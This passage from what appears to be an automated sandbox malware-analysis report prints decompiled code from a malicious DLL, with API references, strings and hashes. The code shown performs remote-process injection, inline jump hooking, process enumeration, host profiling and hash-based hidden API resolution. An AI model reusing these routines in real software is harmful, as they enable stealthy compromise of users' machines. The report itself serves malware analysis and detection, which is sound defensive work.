					_v37 = _t139;
					_t148 = 0xf;
					if(_t124 > _t148) {
						do {
							L12:
							_t64 = _t139 + 0x41; // 0x41
							 *((char*)(_t164 + _t139 - 0x30)) = _t64;
							_t139 = _t139 + 1;
						} while (_t139 < _t148);
						L13:
						lstrlenW( &_v52);
						 *0x10020d60 = _v16;
						 *0x10020d88 = _v8;
						goto L17;
					}
					_t148 = _t124;
					if(_t148 == 0) {
						goto L13;
					}
					goto L12;
				}
			}

0x1000a4ae
0x1000a4b4
0x1000a4b6
0x1000a4ba
0x1000a4bc
0x1000a4bf
0x1000a4c2
0x1000a4c5
0x1000a4c8
0x1000a4cb
0x1000a4d6
0x1000a4d9
0x1000a4e0
0x1000a4e0
0x1000a4e5
0x1000a4e8
0x1000a4ea
0x1000a4f3
0x1000a6f0
0x1000a6f0
0x1000a6f3
0x1000a6f6
0x1000a6fb
0x1000a701
0x1000a704
0x1000a704
0x1000a707
0x1000a70b
0x1000a70d
0x1000a722
0x1000a722
0x1000a72c
0x1000a736
0x1000a736
0x1000a73d
0x1000a73d
0x1000a502
0x1000a51c
0x00000000
0x00000000
0x1000a522
0x1000a528
0x1000a52c
0x1000a531
0x1000a537
0x1000a53a
0x1000a53f
0x1000a546
0x1000a54d
0x1000a554
0x1000a557
0x1000a55e
0x1000a561
0x1000a568
0x1000a56b
0x1000a577
0x1000a594
0x1000a599
0x1000a5a1
0x1000a5a4
0x1000a5ab
0x1000a5af
0x1000a5af
0x1000a5a1
0x1000a5cb
0x1000a5da
0x1000a5dd
0x1000a5e2
0x00000000
0x1000a60c
0x1000a617
0x1000a61c
0x1000a623
0x00000000
0x00000000
0x1000a638
0x1000a64b
0x1000a661
0x1000a66d
0x1000a672
0x1000a677
0x1000a67a
0x1000a67f
0x1000a68f
0x1000a695
0x1000a69a
0x1000a6a6
0x1000a6b0
0x1000a6b8
0x1000a6bd
0x1000a6c0
0x1000a6c8
0x1000a6c8
0x1000a6c8
0x1000a6cb
0x1000a6cf
0x1000a6d0
0x1000a6d4
0x1000a6d8
0x1000a6e1
0x1000a6e9
0x00000000
0x1000a6e9
0x1000a6c2
0x1000a6c6
0x00000000
0x00000000
0x00000000
0x1000a6c6

APIs

NtCreateSection.76D4C8D1(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 1000A517
RegisterClassExA.USER32(?), ref: 1000A56E
CreateWindowExA.USER32(00000000,section,00000001,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 1000A599
DestroyWindow.USER32(00000000), ref: 1000A5A4
UnregisterClassA.USER32(section,00000000), ref: 1000A5AF
NtMapViewOfSection.76D4C8D1(?,00000000), ref: 1000A5DA
NtMapViewOfSection.76D4C8D1(?,?,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000A601
VirtualAllocEx.KERNELBASE(?,00000000,00001AC4,00001000,00000004), ref: 1000A645
WriteProcessMemory.KERNELBASE(?,00000000,00000001,00001AC4,?), ref: 1000A661

Part of subcall function 1000953B: HeapFree.KERNEL32(00000000,00000000), ref: 10009581

lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 1000A6D8
NtUnmapViewOfSection.76D4C8D1(00000000), ref: 1000A722
NtClose.76D4C8D1(00000000), ref: 1000A736

Strings

Jjischug, xrefs: 1000A6AB
0, xrefs: 1000A561
0}Yw, xrefs: 1000A53A
section, xrefs: 1000A594, 1000A597

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
String ID: 0$0}Yw$Jjischug$section
API String ID: 494031690-2139206173
Opcode ID: 9a737af273db41b1fde892004d7383aa949273c8ddf4d36099d85bddc829d53d
Instruction ID: b5f4344525c8211231c04cd401d06040389fe4c66827731468beb840fcedfec4
Opcode Fuzzy Hash: 9a737af273db41b1fde892004d7383aa949273c8ddf4d36099d85bddc829d53d
Instruction Fuzzy Hash: 8D8118B5A01219EFEB00DFD4CC84AEEBBB9FF09344F14416AF505A7261D771AA81CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000B231 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E1000B231(void* __edx, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v144;
				char _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t69;
				intOrPtr _t71;
				void* _t72;
				intOrPtr _t74;
				void* _t75;
				intOrPtr _t76;
				intOrPtr* _t78;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				intOrPtr _t88;
				intOrPtr _t90;
				void* _t91;
				intOrPtr _t93;
				intOrPtr _t94;
				void* _t95;
				void* _t99;
				intOrPtr _t101;
				intOrPtr _t103;
				short _t108;
				char _t110;
				intOrPtr _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t125;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t140;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t151;
				void* _t152;
				WCHAR* _t153;
				char* _t154;
				intOrPtr _t165;
				intOrPtr _t180;
				void* _t196;
				struct _OSVERSIONINFOA* _t197;
				void* _t198;
				void* _t200;
				char _t203;
				void* _t204;
				char* _t205;
				void* _t208;
				int* _t209;
				void* _t222;

				_t222 = __fp0;
				_t151 =  *0x10020d60; // 0x10000000
				_t69 = E10009525(0x1ac4);
				_t197 = _t69;
				if(_t197 != 0) {
					 *((intOrPtr*)(_t197 + 0x1640)) = GetCurrentProcessId();
					_t71 =  *0x10020d58; // 0x4a1f900
					_t72 =  *((intOrPtr*)(_t71 + 0xb0))(_t198);
					_t3 = _t197 + 0x648; // 0x648
					E100151C2( *((intOrPtr*)(_t197 + 0x1640)) + _t72, _t3);
					_t74 =  *0x10020d58; // 0x4a1f900
					_t5 = _t197 + 0x1644; // 0x1644
					_t199 = _t5;
					_t75 =  *((intOrPtr*)(_t74 + 0x12c))(0, _t5, 0x105);
					_t212 = _t75;
					if(_t75 != 0) {
						 *((intOrPtr*)(_t197 + 0x1854)) = E10009961(_t199, _t212);
					}
					_t76 =  *0x10020d58; // 0x4a1f900
					_t78 = E1000E500( *((intOrPtr*)(_t76 + 0x130))()); // executed
					 *((intOrPtr*)(_t197 + 0x110)) = _t78;
					_t162 =  *_t78;
					if(E1000E67B( *_t78) == 0) {
						_t80 = E1000E550(_t162, _t199); // executed
						__eflags = _t80;
						_t165 = (0 | _t80 > 0x00000000) + 1;
						__eflags = _t165;
						 *((intOrPtr*)(_t197 + 0x214)) = _t165;
					} else {
						 *((intOrPtr*)(_t197 + 0x214)) = 3;
					}
					_t14 = _t197 + 0x220; // 0x220, executed
					_t81 = E1000EE8D(_t14); // executed
					 *((intOrPtr*)(_t197 + 0x218)) = _t81;
					_t82 = E1000EE52(_t14); // executed
					 *((intOrPtr*)(_t197 + 0x21c)) = _t82;
					_t17 = _t197 + 0x114; // 0x114
					_t200 = _t17;
					 *((intOrPtr*)(_t197 + 0x224)) = _t151;
					_push( &_v16);
					_v12 = 0x80;
					_push( &_v8);
					_v8 = 0x100;
					_push( &_v656);
					_push( &_v12);
					_push(_t200);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t197 + 0x110)))));
					_t88 =  *0x10020d78; // 0x4a1fb48
					_push(0); // executed
					if( *((intOrPtr*)(_t88 + 0x6c))() == 0) {
						GetLastError();
					}
					_t90 =  *0x10020d50; // 0x4a1fa80
					_t91 =  *((intOrPtr*)(_t90 + 0x3c))(0x1000);
					_t28 = _t197 + 0x228; // 0x228
					_t152 = _t28;
					 *(_t197 + 0x1850) = 0 | _t91 > 0x00000000;
					if( *0x10020d5c != 2) {
						E1000B18D(_t152);
					} else {
						E1000B194(_t152);
					}
					_t93 =  *0x10020d5c; // 0x1
					 *((intOrPtr*)(_t197 + 0xa0)) = _t93;
					_t217 = _t152;
					if(_t152 != 0) {
						 *((intOrPtr*)(_t197 + 0x434)) = E10009961(_t152, _t217);
					}
					_t94 = E1000D7B0();
					_t34 = _t197 + 0xb0; // 0xb0
					_t201 = _t34;
					 *((intOrPtr*)(_t197 + 0xac)) = _t94;
					_t95 = E1000D5A6(_t94, _t34, _t217, _t222);
					_t36 = _t197 + 0xd0; // 0xd0
					E10009D4D(_t95, _t34, _t36);
					_t37 = _t197 + 0x438; // 0x438
					E1000997B(_t152, _t37);
					_t99 = E1000EEEC(_t201, E1000D389(_t34), 0);
					_t38 = _t197 + 0x100c; // 0x100c
					E1000D7C6(_t99, _t38, _t222);
					_t101 =  *0x10020d58; // 0x4a1f900
					_t103 = E1000E6CD( *((intOrPtr*)(_t101 + 0x130))(_t200)); // executed
					 *((intOrPtr*)(_t197 + 0x101c)) = _t103;
					E100096BF(_t197, 0, 0x9c);
					_t209 = _t208 + 0xc;
					_t197->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t197);
					 *((intOrPtr*)(_t197 + 0xa8)) = E1000AF90(_t102);
					_t108 = E1000AFB9(_t107);
					_t42 = _t197 + 0x1020; // 0x1020
					_t153 = _t42;
					 *((short*)(_t197 + 0x9c)) = _t108;
					GetWindowsDirectoryW(_t153, 0x104);
					_t110 = E1000948D(_t107, 0x11cb);
					_t180 =  *0x10020d58; // 0x4a1f900
					_t203 = _t110;
					 *_t209 = 0x104;
					_push( &_v668);
					_push(_t203);
					_v8 = _t203;
					if( *((intOrPtr*)(_t180 + 0xf0))() == 0) {
						_t145 =  *0x10020d58; // 0x4a1f900
						 *((intOrPtr*)(_t145 + 0x10c))(_t203, _t153);
					}
					E1000A291( &_v8);
					_t115 =  *0x10020d58; // 0x4a1f900
					_t49 = _t197 + 0x1434; // 0x1434
					_t204 = _t49;
					 *_t209 = 0x209;
					_push(_t204);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t115 + 0xf0))() == 0) {
						E1000B76A(_t204, 0x105, L"%s\\%s", _t153);
						_t143 =  *0x10020d58; // 0x4a1f900
						_t209 =  &(_t209[5]);
						 *((intOrPtr*)(_t143 + 0x10c))(L"USERPROFILE", _t204, "TEMP");
					}
					_push(0x20a);
					_t52 = _t197 + 0x122a; // 0x122a
					_t154 = L"TEMP";
					_t118 =  *0x10020d58; // 0x4a1f900
					_push(_t154);
					if( *((intOrPtr*)(_t118 + 0xf0))() == 0) {
						_t140 =  *0x10020d58; // 0x4a1f900
						 *((intOrPtr*)(_t140 + 0x10c))(_t154, _t204);
					}
					_push(0x40);
					_t205 = L"SystemDrive";
					_push( &_v144);
					_t121 =  *0x10020d58; // 0x4a1f900
					_push(_t205);
					if( *((intOrPtr*)(_t121 + 0xf0))() == 0) {
						_t138 =  *0x10020d58; // 0x4a1f900
						 *((intOrPtr*)(_t138 + 0x10c))(_t205, L"C:");
					}
					_v8 = 0x7f;
					_t60 = _t197 + 0x199c; // 0x199c
					_t125 =  *0x10020d58; // 0x4a1f900
					 *((intOrPtr*)(_t125 + 0xc0))(_t60,  &_v8);
					_t63 = _t197 + 0x100c; // 0x100c
					E100151C2(E1000EEEC(_t63, E1000D389(_t63), 0),  &_v2644);
					_t64 = _t197 + 0x1858; // 0x1858
					E10015194( &_v2644, _t64, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t67 = _t197 + 0x1878; // 0x1878
					_t196 = 0x14;
					E10009A48(_t67, _t196);
					_t136 = E1000AC45(_t196); // executed
					 *((intOrPtr*)(_t197 + 0x1898)) = _t136;
					return _t197;
				}
				return _t69;
			}

0x1000b231
0x1000b23b
0x1000b247
0x1000b24c
0x1000b251
0x1000b25e
0x1000b264
0x1000b269
0x1000b26f
0x1000b27f
0x1000b284
0x1000b289
0x1000b289
0x1000b299
0x1000b29f
0x1000b2a1
0x1000b2aa
0x1000b2aa
0x1000b2b0
0x1000b2bd
0x1000b2c2
0x1000b2c8
0x1000b2d1
0x1000b2df
0x1000b2e6
0x1000b2eb
0x1000b2eb
0x1000b2ec
0x1000b2d3
0x1000b2d3
0x1000b2d3
0x1000b2f2
0x1000b2f8
0x1000b2fd
0x1000b303
0x1000b308
0x1000b30e
0x1000b30e
0x1000b317
0x1000b31d
0x1000b321
0x1000b328
0x1000b32f
0x1000b336
0x1000b33a
0x1000b341
0x1000b342
0x1000b344
0x1000b349
0x1000b350
0x1000b352
0x1000b352
0x1000b358
0x1000b362
0x1000b367
0x1000b367
0x1000b379
0x1000b37f
0x1000b38c
0x1000b381
0x1000b383
0x1000b383
0x1000b391
0x1000b396
0x1000b39c
0x1000b39e
0x1000b3a7
0x1000b3a7
0x1000b3af
0x1000b3b4
0x1000b3b4
0x1000b3ba
0x1000b3c5
0x1000b3ca
0x1000b3d2
0x1000b3d8
0x1000b3e0
0x1000b3f2
0x1000b3f8
0x1000b400
0x1000b405
0x1000b412
0x1000b423
0x1000b429
0x1000b42e
0x1000b431
0x1000b434
0x1000b441
0x1000b447
0x1000b451
0x1000b451
0x1000b457
0x1000b45f
0x1000b46a
0x1000b46f
0x1000b475
0x1000b477
0x1000b484
0x1000b485
0x1000b486
0x1000b491
0x1000b493
0x1000b49a
0x1000b49a
0x1000b4a4
0x1000b4a9
0x1000b4ae
0x1000b4ae
0x1000b4b4
0x1000b4bb
0x1000b4bc
0x1000b4c9
0x1000b4dc
0x1000b4e1
0x1000b4e6
0x1000b4ef
0x1000b4ef
0x1000b4f5
0x1000b4fa
0x1000b500
0x1000b506
0x1000b50b
0x1000b514
0x1000b516
0x1000b51d
0x1000b51d
0x1000b523
0x1000b52b
0x1000b530
0x1000b531
0x1000b536
0x1000b53f
0x1000b541
0x1000b54c
0x1000b54c
0x1000b555
0x1000b55d
0x1000b564
0x1000b569
0x1000b578
0x1000b590
0x1000b597
0x1000b5a5
0x1000b5b0
0x1000b5b1
0x1000b5b5
0x1000b5bb
0x1000b5bc
0x1000b5c4
0x1000b5c9
0x00000000
0x1000b5d1
0x1000b5d5

APIs

Part of subcall function 10009525: RtlAllocateHeap.76D4C8D1(00000008,?,?,1000990B,00000100,00000001,100010BC), ref: 10009533

GetCurrentProcessId.KERNEL32(?,?,00000001), ref: 1000B258
GetLastError.KERNEL32(?,?,00000001), ref: 1000B352
GetVersionExA.KERNEL32(00000000,?,?,00000001), ref: 1000B434

Part of subcall function 1000E550: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,10000000), ref: 1000E5F4

GetWindowsDirectoryW.KERNEL32(00001020,00000104,?,?,00000001), ref: 1000B45F

Strings

%s\%s, xrefs: 1000B4D1
TEMP, xrefs: 1000B4CB
SystemDrive, xrefs: 1000B52B, 1000B536, 1000B54B
USERPROFILE, xrefs: 1000B4BC, 1000B4EA
TEMP, xrefs: 1000B500, 1000B50B, 1000B51C

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastNotificationProcessVersionWindows
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 1354322220-2706916422
Opcode ID: c3f59ee73e5be98a47a9f9a7ffb566f7efe146b61a4d604da622eee37d8853a8
Instruction ID: 9ecf3e02f1acfa31b532110abafa1360833cb570ef2274f9fa1bd2246b0adb1a
Opcode Fuzzy Hash: c3f59ee73e5be98a47a9f9a7ffb566f7efe146b61a4d604da622eee37d8853a8
Instruction Fuzzy Hash: FAA18E35701A16AFE704EFB4CC89BEAB7A9FF48340F100169F519D7252EB30BA458B91

Uniqueness

Uniqueness Score: -1.00%

Function 1000AA02 Relevance: 6.1, APIs: 4, Instructions: 118
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E1000AA02(intOrPtr __ecx, void** __edx, intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				intOrPtr _v15;
				void _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				long _v32;
				void* _v572;
				char _v748;
				signed char _t39;
				intOrPtr _t40;
				void* _t41;
				void* _t43;
				intOrPtr _t47;
				void _t51;
				intOrPtr _t68;
				void** _t69;
				void* _t72;
				intOrPtr _t74;
				long _t78;
				void* _t80;

				_t70 = __ecx;
				_t69 = __edx;
				_v28 = __ecx;
				_t74 =  *0x10020d88; // 0x4a1fc98
				_t80 = 0;
				_t2 = _t74 + 0x1898; // 0x4
				_t39 =  *_t2;
				if(_t39 == 0x200 || _t39 == 0x80 || _t39 == 2 ||  *((intOrPtr*)(_t74 + 4)) >= 0xa && (_t39 & 0x00000004) != 0) {
					_t40 = E1000A2BD(_t70, _t74); // executed
					 *0x10020e70 = _t40;
				} else {
					_t40 =  *0x10020e70; // 0x4a21868
				}
				if(_t40 != 0) {
					_t41 = E1000A4A8( *_t69, _a4); // executed
					_t80 = _t41;
					if(_t80 == 0) {
						goto L9;
					} else {
						E100096BF( &_v748, 0, 0x2cc);
						_v748 = 0x10002;
						_push( &_v748);
						_t47 =  *0x10020d58; // 0x4a1f900
						_push(_t69[1]);
						if( *((intOrPtr*)(_t47 + 0xb8))() == 0) {
							goto L9;
						} else {
							_v20 = _v20 & 0x00000000;
							_t51 = _t80 - _a4 + _v28;
							_t72 = _v572;
							_t78 = 5;
							if(_a8 != 1) {
								if(_a8 != 2) {
									_t43 = 0;
								} else {
									_v16 = _t51;
									_t78 = 4;
									goto L17;
								}
							} else {
								_v16 = 0xe9;
								_v15 = _t51 - _t72 - _t78;
								L17:
								_v8 = _t78;
								_v24 = _t72;
								if(NtProtectVirtualMemory( *_t69,  &_v24,  &_v8, 4,  &_v20) >= 0) {
									if(NtWriteVirtualMemory( *_t69, _v572,  &_v16, _t78,  &_v8) < 0) {
										goto L18;
									} else {
										_v32 = _v32 & 0x00000000;
										if(NtProtectVirtualMemory( *_t69,  &_v24,  &_v8, _v20,  &_v32) >= 0) {
											goto L9;
										} else {
											goto L18;
										}
									}
								} else {
									L18:
									_t80 = 0;
									goto L9;
								}
								L23:
							}
						}
					}
				} else {
					_t68 =  *0x10020d94; // 0x4a1fa48
					 *0x10020e70 = _t68;
					L9:
					E1000A3EC();
					_t43 = _t80;
				}
				return _t43;
				goto L23;
			}

0x1000aa02
0x1000aa0c
0x1000aa0e
0x1000aa11
0x1000aa18
0x1000aa1b
0x1000aa1b
0x1000aa26
0x1000aa45
0x1000aa4a
0x1000aa3e
0x1000aa3e
0x1000aa3e
0x1000aa51
0x1000aa6e
0x1000aa73
0x1000aa77
0x00000000
0x1000aa79
0x1000aa87
0x1000aa8f
0x1000aa9f
0x1000aaa0
0x1000aaa5
0x1000aab0
0x00000000
0x1000aab2
0x1000aab2
0x1000aabb
0x1000aac2
0x1000aaca
0x1000aacb
0x1000aade
0x1000ab53
0x1000aae0
0x1000aae2
0x1000aae5
0x00000000
0x1000aae5
0x1000aacd
0x1000aacf
0x1000aad5
0x1000aae6
0x1000aae9
0x1000aaf2
0x1000ab06
0x1000ab2a
0x00000000
0x1000ab2c
0x1000ab2c
0x1000ab4b
0x00000000
0x1000ab51
0x00000000
0x1000ab51
0x1000ab4b
0x1000ab08
0x1000ab08
0x1000ab08
0x00000000
0x1000ab08
0x00000000
0x1000ab06
0x1000aacb
0x1000aab0
0x1000aa53
0x1000aa53
0x1000aa58
0x1000aa5d
0x1000aa5d
0x1000aa62
0x1000aa62
0x1000aa68
0x00000000

APIs

Wow64GetThreadContext.KERNEL32(?,00010002,?,00000000,00000001), ref: 1000AAA8
NtProtectVirtualMemory.76D4C8D1(?,?,00000001,00000004,00000000,?,00000000,00000001), ref: 1000AB01
NtWriteVirtualMemory.76D4C8D1(?,?,00000002,00000004,00000001,?,00000000,00000001), ref: 1000AB25
NtProtectVirtualMemory.76D4C8D1(?,?,00000001,00000000,00000000,?,00000000,00000001), ref: 1000AB46

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: MemoryVirtual$Protect$ContextThreadWow64Write
String ID:
API String ID: 1811831458-0
Opcode ID: e7f6d40e21079af8cd1ea1dee90f303181879499d9c5e0249dd15e369b9b0682
Instruction ID: 8bc5829f845a12ea8b60137831a6806cc275a37a637710cc3731e64fdec36fb8
Opcode Fuzzy Hash: e7f6d40e21079af8cd1ea1dee90f303181879499d9c5e0249dd15e369b9b0682
Instruction Fuzzy Hash: 2441AC71A00219EFEB50CFA8C988A9EB7FAFF4A380F104265F505E61A5D770DA85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1000CD1E Relevance: 6.1, APIs: 4, Instructions: 66
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E1000CD1E(void* __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				intOrPtr _v312;
				signed int _t16;
				signed int _t17;
				intOrPtr _t30;
				void* _t33;
				void* _t43;
				void* _t45;

				_t33 = __edx;
				_v304 = __ecx;
				_t16 = CreateToolhelp32Snapshot(2, 0);
				_t45 = _t16;
				_t17 = _t16 | 0xffffffff;
				if(_t45 != _t17) {
					E100096BF( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t45,  &_v304) != 0) {
						do {
							_t43 = _v312( &_v308, _t33);
						} while (_t43 != 0 && Process32Next(_t45,  &_v308) != 0);
						FindCloseChangeNotification(_t45);
						_t17 = 0 | _t43 == 0x00000000;
					} else {
						_t30 =  *0x10020d58; // 0x4a1f900
						 *((intOrPtr*)(_t30 + 0x34))(_t45);
						_t17 = 0xfffffffe;
					}
				}
				return _t17;
			}

0x1000cd36
0x1000cd38
0x1000cd3c
0x1000cd3f
0x1000cd41
0x1000cd46
0x1000cd55
0x1000cd5d
0x1000cd71
0x1000cd81
0x1000cd8b
0x1000cd8f
0x1000cdac
0x1000cdb3
0x1000cd73
0x1000cd73
0x1000cd79
0x1000cd7e
0x1000cd7e
0x1000cd71
0x1000cdbc

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000019,?,00000018), ref: 1000CD3C

Part of subcall function 100096BF: memset.MSVCRT ref: 100096D1

Process32First.KERNEL32(00000000,?), ref: 1000CD6C
Process32Next.KERNEL32(00000000,?), ref: 1000CD9F
FindCloseChangeNotification.KERNELBASE(00000000), ref: 1000CDAC

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32memset
String ID:
API String ID: 2518216231-0
Opcode ID: 996dcc371edf8a3de5ade8aca68dc2e00b0d215e3b0d06ae6d94bc47d4b545c2
Instruction ID: e0ff1e4e8235e93eda23a65ce13b7923652eca031fd4941afaeddc76423dec26
Opcode Fuzzy Hash: 996dcc371edf8a3de5ade8aca68dc2e00b0d215e3b0d06ae6d94bc47d4b545c2
Instruction Fuzzy Hash: 5911C4736053559BE350DFA8DC48E9B7BECEFC53A0F15062AF910C71A1EB20E90687A5

Uniqueness

Uniqueness Score: -1.00%

Function 1000970D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000970D(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E1000EEEC( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000D389( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

0x10009716
0x10009718
0x1000971b
0x1000971e
0x10009724
0x10009781
0x00000000
0x10009781
0x10009726
0x10009731
0x10009734
0x10009739
0x1000973e
0x10009741
0x10009743
0x10009746
0x10009749
0x1000974e
0x00000000
0x00000000
0x00000000
0x00000000
0x10009750
0x10009750
0x10009762
0x1000976f
0x10009773
0x00000000
0x00000000
0x10009775
0x10009778
0x10009779
0x1000977f
0x00000000
0x00000000
0x00000000
0x1000977f
0x10009796
0x1000979b
0x1000979f
0x00000000
0x100097ab
0x100097ab
0x100097ad
0x100097ad
0x100097b3
0x00000000
0x00000000
0x100097b9
0x100097bd
0x100097c1
0x00000000
0x00000000
0x00000000
0x100097c1
0x100097c7
0x100097cf
0x100097d4
0x100097d7
0x100097d7
0x100097d9
0x100097dd
0x100097e5
0x00000000
0x00000000
0x100097e9
0x100097f1
0x00000000
0x00000000
0x00000000
0x100097f1

APIs

LoadLibraryA.KERNELBASE(.dll,?,00000140,00000000), ref: 100097DD
GetProcAddress.KERNEL32(00000000,?), ref: 100097E9

Strings

.dll, xrefs: 100097D9, 100097DC

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
